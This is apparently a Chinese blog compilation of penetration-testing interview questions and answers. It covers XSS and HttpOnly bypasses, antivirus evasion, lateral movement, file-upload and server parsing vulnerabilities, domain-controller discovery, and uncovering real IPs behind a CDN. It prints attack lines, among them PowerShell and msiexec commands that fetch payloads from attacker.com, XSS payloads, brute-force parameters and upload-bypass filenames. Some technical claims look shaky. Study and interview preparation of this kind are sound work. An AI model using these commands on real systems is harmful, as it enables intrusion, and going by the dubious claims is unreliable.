2025年渗透测试面试题总结-29(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
二百四十一、XSS 设置Http-Only如何绕过
二百四十二、XSS攻击手段分类
二百四十三、高杀软覆盖工作组的渗透策略
二百四十四、内网横向工具选型
二百四十五、fscan扫描崩溃处理
二百四十六、Apache/IIS解析漏洞
二百四十七、PHP文件上传绕过
黑名单绕过
白名单绕过
解析漏洞利用
二百四十八、工作组横向权限要求
二百四十九、域控定位方法大全
二百五十、CDN真实IP溯源
二百四十一、xss 设置http-only如何绕过二百四十二、xss攻击手段有哪些二百四十三、遇到全是杀软的工作组怎么办二百四十四、使用什么工具内网横向二百四十五、fscan扫机器崩了怎么办二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上传绕过方式(黑、白名单、解析漏洞)二百四十八、工作组横向需要用户什么权限二百四十九、如何查找域控(尽可能多的方式)二百五十、如何从cdn 真实ip二百四十一、XSS 设置Http-Only如何绕过
4类绕过技术:
- 浏览器漏洞利用
- 特定浏览器版本(如Chrome < v83)存在
Document.cookieAPI绕过漏洞。- 跨域劫持(CORS滥用)
- 利用配置错误的
Access-Control-Allow-Origin: *,通过XHR请求带凭证访问目标域:javascriptfetch('https://target.com/data', {credentials: 'include'}).then(...)- 服务端请求伪造(SSRF+XSS组合)
- 通过XSS触发内网SSRF,间接获取含Cookie的响应(需存在SSRF漏洞)。
- 客户端缓存嗅探
- 读取浏览器缓存中未标记HttpOnly的敏感数据(如
localStorage中的Token)。
二百四十二、XSS攻击手段分类
5大攻击类型及代表手法:
类型 原理 案例 反射型XSS 恶意脚本通过URL参数注入 http://site.com?search=<script>alert(1)</script>存储型XSS 脚本持久化存储到数据库 评论区植入恶意JS,影响所有访问者 DOM型XSS 前端JS解析漏洞导致执行 eval(location.hash.slice(1))盲打XSS 攻击后台管理界面 表单字段注入,等待管理员触发 mXSS HTML解析变异导致过滤失效 <img src="x" onerror=alert(1)>被错误净化
二百四十三、高杀软覆盖工作组的渗透策略
免杀与隐蔽渗透方案:
- 无文件攻击
- PowerShell内存加载:
powershellIEX(New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1')- 合法工具滥用(LOLBAS)
- 使用微软签名的二进制文件执行操作:
cmdmsiexec /i http://attacker.com/payload.msi /quiet- 网络层隐蔽
- 使用ICMP/DNS隧道通信(工具:DNSCat2)。
- 进程注入
- 注入到可信进程(如
explorer.exe)绕过内存扫描。- 硬件级后门
- 利用网卡固件漏洞(如Intel NIC)实现持久化。
二百四十四、内网横向工具选型
按场景匹配工具:
目标 推荐工具 关键参数 主机发现 arp-scan,nmap -sn--localnet扫描本地网段服务爆破 Hydra,Medusa-L user.txt -P pass.txt smb://票据传递 Impacket-psexec-k -no-pass使用Kerberos票据漏洞利用 Metasploit,CobaltStrikeuse exploit/windows/smb/psexec隐蔽通信 CobaltStrike BeaconHTTPS监听+SOCKS代理
二百四十五、fscan扫描崩溃处理
稳定性优化方案:
- 限制并发与超时
bash./fscan -h 192.168.1.0/24 -t 64 -timeout 3
-t 64:线程数≤64-timeout 3:单主机超时3秒- 分片扫描
bashsplit -l 100 targets.txt && for i in x*; do ./fscan -hf $i; done- 内存释放优化
- 使用
ulimit -v unlimited解除内存限制。- 分布式扫描
- 将目标列表分割到多台VPS执行。
二百四十六、Apache/IIS解析漏洞
服务器解析漏洞详解:
服务器 漏洞版本 利用方式 Apache 1.x/2.x(配置错误) 上传 test.php.jpg触发PHP执行IIS 6.0 Win2003 /shell.asp;.jpg执行ASP代码IIS 7.0+ 配置FastCGI错误 上传 .php文件改名为shell.jpg/.phpNginx <0.8.37 shell.jpg%00.php截断解析
二百四十七、PHP文件上传绕过
黑白名单对抗技术:
黑名单绕过
- 后缀大小写变形:
Shell.PhP- 双写后缀:
shell.pphphp→ 过滤后为shell.php- 特殊后缀:
.phtml,.php5,.phar白名单绕过
- %00截断:
shell.jpg%00.php(需PHP<5.3.4)- 路径拼接:
php通过move_uploaded_file($_FILES["file"]["tmp_name"], "/uploads/" . $_GET["dir"] . "/" . $filename);?dir=shell.php%00截断解析漏洞利用
- 结合Apache多后缀解析:
shell.php.xxx→ 若.xxx未定义,则向前识别为PHP
二百四十八、工作组横向权限要求
必需的最小权限:
- SMB协议
- 目标主机的本地管理员凭证(或SMB共享写入权限)。
- WMI执行
- 本地管理员权限 + 防火墙放行135/445端口。
- PsExec
- 管理员凭据 + ADMIN$共享访问权限。
- 计划任务
- 需加入本地管理员组(或Task Scheduler服务权限)。
二百四十九、域控定位方法大全
7种高效定位技术:
- DNS查询
powershellnslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com- 端口扫描
- 定位389(LDAP)/636(LDAPS)/88(Kerberos)端口开放主机。
- NetBIOS信息
cmdnbtstat -A 192.168.1.1 # 查找<1C>记录(域控制器)- 活动目录模块
powershellGet-ADDomainController -Discover -Service PrimaryDC- 日志分析
- 事件ID 4662(对象访问日志)中定位
CN=Domain Controllers。- SPN扫描
bashsetspn -T domain.com -Q */*- 默认组策略路径
\\domain.com\SYSVOL\domain.com\Policies仅域控可写。
二百五十、CDN真实IP溯源
6层探测技术:
- 历史DNS记录
- 查询
securitytrails.com获取历史A记录。- 子域名爆破
- 使用
amass扫描未接入CDN的子域(如test.example.com)。- SSL证书匹配
- 通过
crt.sh搜索相同证书的IP。- 邮件服务器溯源
- 分析邮件头
Received字段中的原始IP。- 协议漏洞探测
- 发送HTTP 1.0请求或异常Host头(如
Host: 127.0.0.1)触发CDN转发错误。- 全球Ping监测
- 通过
viewdns.info对比全球节点响应差异。